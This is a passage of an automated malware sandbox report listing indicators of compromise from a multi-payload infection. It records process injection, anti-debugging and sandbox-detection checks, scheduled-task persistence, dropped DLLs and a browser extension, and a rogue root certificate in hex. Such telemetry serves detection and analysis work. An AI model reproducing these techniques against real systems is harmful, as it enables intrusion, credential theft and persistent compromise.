File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 DlRIpsJ.exe File opened for modification C:\Windows\System32\GroupPolicy nO20MXBUGloxh9agdli788Vc.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol nO20MXBUGloxh9agdli788Vc.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI nO20MXBUGloxh9agdli788Vc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 DlRIpsJ.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol AppGate2103v15.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\5240.hecate svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
AppGate2103v15.exeoiktbrfhNygCPSFVdJ1Rkgku.exenO20MXBUGloxh9agdli788Vc.exeAppGate2103v01.exepid process 3164 AppGate2103v15.exe 3164 AppGate2103v15.exe 6704 oiktbrfhNygCPSFVdJ1Rkgku.exe 6704 oiktbrfhNygCPSFVdJ1Rkgku.exe 4480 nO20MXBUGloxh9agdli788Vc.exe 4480 nO20MXBUGloxh9agdli788Vc.exe 5976 AppGate2103v01.exe 5976 AppGate2103v01.exe -
Suspicious use of SetThreadContext 25 IoCs
Processes:
Zinckeds.exerooma.exenetbtugc.execrypted.exeaaaaaaaa.exewxijgyp.exetime2time.exefile300un.exezwuivg.exertx.exeasdf.exewsiopohwqsd.exeQEwecfyhj.exegywervcyuj.exengown.exeupdater.exegHIvTf22qvmZjum.exewmixedwk.exesvchost.exesdf34ert3etgrthrthfghfghjfgh.exedescription pid process target process PID 4948 set thread context of 2804 4948 Zinckeds.exe RegAsm.exe PID 3356 set thread context of 4180 3356 rooma.exe New Text Document.exe PID 3356 set thread context of 3756 3356 rooma.exe netbtugc.exe PID 3756 set thread context of 4180 3756 netbtugc.exe New Text Document.exe PID 3756 set thread context of 5684 3756 netbtugc.exe Firefox.exe PID 5920 set thread context of 2284 5920 crypted.exe RegAsm.exe PID 2348 set thread context of 2580 2348 aaaaaaaa.exe RegAsm.exe PID 2464 set thread context of 5276 2464 wxijgyp.exe RegSvcs.exe PID 4108 set thread context of 1060 4108 time2time.exe msbuild.exe PID 4240 set thread context of 6312 4240 file300un.exe msbuild.exe PID 5680 set thread context of 5204 5680 zwuivg.exe RegSvcs.exe PID 6580 set thread context of 7056 6580 rtx.exe rtx.exe PID 2148 set thread context of 2312 2148 asdf.exe RegAsm.exe PID 6360 set thread context of 2364 6360 wsiopohwqsd.exe RegSvcs.exe PID 6116 set thread context of 6488 6116 QEwecfyhj.exe RegSvcs.exe PID 5672 set thread context of 4444 5672 gywervcyuj.exe gpupdate.exe PID 5984 set thread context of 6768 5984 ngown.exe RegSvcs.exe PID 5052 set thread context of 4512 5052 updater.exe conhost.exe PID 5052 set thread context of 5860 5052 updater.exe explorer.exe PID 1016 set thread context of 6760 1016 gHIvTf22qvmZjum.exe gHIvTf22qvmZjum.exe PID 6284 set thread context of 4292 6284 wmixedwk.exe svchost.exe PID 4292 set thread context of 1308 4292 svchost.exe svchost.exe PID 4292 set thread context of 3704 4292 svchost.exe svchost.exe PID 4292 set thread context of 5240 4292 svchost.exe svchost.exe PID 5700 set thread context of 1408 5700 sdf34ert3etgrthrthfghfghjfgh.exe katA5E1.tmp -
Drops file in Program Files directory 35 IoCs
Processes:
oaNMFMP.exeoiii.exesvchost.exeDlRIpsJ.exesvchost.exesvchost.exesvchost.exedescription ioc process File created C:\Program Files (x86)\DQANlvmTAvZU2\SdYGLuLkowAse.dll oaNMFMP.exe File created C:\Program Files\Windows Media Player\wmixedwk.exe oiii.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxds svchost.exe File created C:\Program Files\Windows Media Player\background.jpg oiii.exe File created C:\Program Files (x86)\ADJLsahCU\AAnZBg.dll DlRIpsJ.exe File created C:\Program Files (x86)\ADJLsahCU\dGukws.dll oaNMFMP.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\jOQorQH.dll DlRIpsJ.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\juFMLuc.dll oaNMFMP.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\xwTsNCD.xml oaNMFMP.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpb svchost.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DlRIpsJ.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\NAqzQYE.xml DlRIpsJ.exe File created C:\Program Files (x86)\ADJLsahCU\HaouQex.xml oaNMFMP.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\tPTBJIh.xml oaNMFMP.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\MfxMMeg.dll oaNMFMP.exe File opened for modification C:\Program Files\Windows Media Player\wmixedwk.exe oiii.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi DlRIpsJ.exe File created C:\Program Files (x86)\ADJLsahCU\xFHDGyR.xml DlRIpsJ.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\UHNAHEo.xml DlRIpsJ.exe File created C:\Program Files (x86)\mWJfrhglotUn\AQyTknk.dll DlRIpsJ.exe File opened for modification C:\Program Files\Windows Media Player\mpsvc.dll svchost.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DlRIpsJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja DlRIpsJ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi oaNMFMP.exe File created C:\Program Files\Windows Media Player\mpsvc.dll oiii.exe File created C:\Program Files\Windows Media Player\wmpnetwk.exe oiii.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpa svchost.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\DogRzDq.xml oaNMFMP.exe File opened for modification C:\Program Files\Windows Media Player\ppqqxpp svchost.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi oaNMFMP.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\YADAKnkZABmgj.dll DlRIpsJ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi DlRIpsJ.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\vMlmyJm.dll DlRIpsJ.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\VpmQlsw.xml DlRIpsJ.exe File created C:\Program Files (x86)\mWJfrhglotUn\VcRFEMZ.dll oaNMFMP.exe -
Drops file in Windows directory 7 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job schtasks.exe File opened for modification C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job schtasks.exe File created C:\Windows\Tasks\XyyyteIMwZeutaZuw.job schtasks.exe File opened for modification C:\Windows\Tasks\XyyyteIMwZeutaZuw.job schtasks.exe File created C:\Windows\Tasks\FPieTEPPuEmJrhC.job schtasks.exe File opened for modification C:\Windows\Tasks\FPieTEPPuEmJrhC.job schtasks.exe File created C:\Windows\Tasks\rrqYunoktxOQmCoCX.job schtasks.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3600 sc.exe 2180 sc.exe 6592 sc.exe 5368 sc.exe 4728 sc.exe 6700 sc.exe 2356 sc.exe 6112 sc.exe 6764 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1940 3052 WerFault.exe 4.exe 4396 4948 WerFault.exe Zinckeds.exe 6112 2676 WerFault.exe Zinck2.exe 1280 6428 WerFault.exe AIrj5QVEYuGuBGBtXUl948x8.exe 2620 5680 WerFault.exe zwuivg.exe 2664 6360 WerFault.exe wsiopohwqsd.exe 228 2676 WerFault.exe Zinck2.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AIrj5QVEYuGuBGBtXUl948x8.exe4.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AIrj5QVEYuGuBGBtXUl948x8.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AIrj5QVEYuGuBGBtXUl948x8.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AIrj5QVEYuGuBGBtXUl948x8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4.exe -
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Setup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe -
Creates scheduled task(s) 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1960 schtasks.exe 6828 schtasks.exe 5440 schtasks.exe 4008 schtasks.exe 6404 schtasks.exe 6952 schtasks.exe 6896 schtasks.exe 752 schtasks.exe 6008 schtasks.exe 2696 schtasks.exe 6972 schtasks.exe 6032 schtasks.exe 3268 schtasks.exe 4988 schtasks.exe 2148 schtasks.exe 4824 schtasks.exe 4580 schtasks.exe 6728 schtasks.exe 6732 schtasks.exe 4240 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4940 timeout.exe 5512 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 3020 tasklist.exe 4920 tasklist.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
Install.exeInstall.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1572 taskkill.exe -
Processes:
netbtugc.exedescription ioc process Key created \Registry\User\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 netbtugc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeDlRIpsJ.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exeInstall.exepowershell.exeoaNMFMP.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dcc000000fb9a790967add111abcd00c04fc30936fa000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 DlRIpsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" DlRIpsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing oaNMFMP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8a2ad7b7-0000-0000-0000-d01200000000} DlRIpsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" DlRIpsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer DlRIpsJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{4E125F37-767B-414F-8394-73E979514581} msedge.exe -
Processes:
RegAsm.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fighting.pifstart.exerooma.exeregasms.exenetbtugc.exepid process 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 4436 start.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 3356 rooma.exe 4772 regasms.exe 4772 regasms.exe 3756 netbtugc.exe 3756 netbtugc.exe 3756 netbtugc.exe 3756 netbtugc.exe 3756 netbtugc.exe 3756 netbtugc.exe -
Suspicious behavior: MapViewOfSection 14 IoCs
Processes:
rooma.exeNew Text Document.exenetbtugc.exewxijgyp.exezwuivg.exewsiopohwqsd.exeQEwecfyhj.exegywervcyuj.exengown.exepid process 3356 rooma.exe 4180 New Text Document.exe 4180 New Text Document.exe 3756 netbtugc.exe 3756 netbtugc.exe 3756 netbtugc.exe 3756 netbtugc.exe 2464 wxijgyp.exe 2464 wxijgyp.exe 5680 zwuivg.exe 6360 wsiopohwqsd.exe 6116 QEwecfyhj.exe 5672 gywervcyuj.exe 5984 ngown.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
New Text Document.exetasklist.exetasklist.exestart.exeregasms.exesvchos.exejsc.exeRegAsm.exeRegAsm.exeRegSvcs.exepowershell.exemsbuild.exean4IhMEUJGaXcuvcgGd8PX9U.exemsbuild.exepowershell.exeRegSvcs.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4180 New Text Document.exe Token: SeDebugPrivilege 3020 tasklist.exe Token: SeDebugPrivilege 4920 tasklist.exe Token: SeDebugPrivilege 4436 start.exe Token: SeDebugPrivilege 4772 regasms.exe Token: SeDebugPrivilege 4216 svchos.exe Token: SeDebugPrivilege 5372 jsc.exe Token: SeDebugPrivilege 2580 RegAsm.exe Token: SeBackupPrivilege 2580 RegAsm.exe Token: SeSecurityPrivilege 2580 RegAsm.exe Token: SeSecurityPrivilege 2580 RegAsm.exe Token: SeSecurityPrivilege 2580 RegAsm.exe Token: SeSecurityPrivilege 2580 RegAsm.exe Token: SeDebugPrivilege 2284 RegAsm.exe Token: SeDebugPrivilege 5276 RegSvcs.exe Token: SeDebugPrivilege 368 powershell.exe Token: SeDebugPrivilege 1060 msbuild.exe Token: SeManageVolumePrivilege 5792 an4IhMEUJGaXcuvcgGd8PX9U.exe Token: SeDebugPrivilege 6312 msbuild.exe Token: SeDebugPrivilege 6180 powershell.exe Token: SeDebugPrivilege 5204 RegSvcs.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeIncreaseQuotaPrivilege 3268 WMIC.exe Token: SeSecurityPrivilege 3268 WMIC.exe Token: SeTakeOwnershipPrivilege 3268 WMIC.exe Token: SeLoadDriverPrivilege 3268 WMIC.exe Token: SeSystemProfilePrivilege 3268 WMIC.exe Token: SeSystemtimePrivilege 3268 WMIC.exe Token: SeProfSingleProcessPrivilege 3268 WMIC.exe Token: SeIncBasePriorityPrivilege 3268 WMIC.exe Token: SeCreatePagefilePrivilege 3268 WMIC.exe Token: SeBackupPrivilege 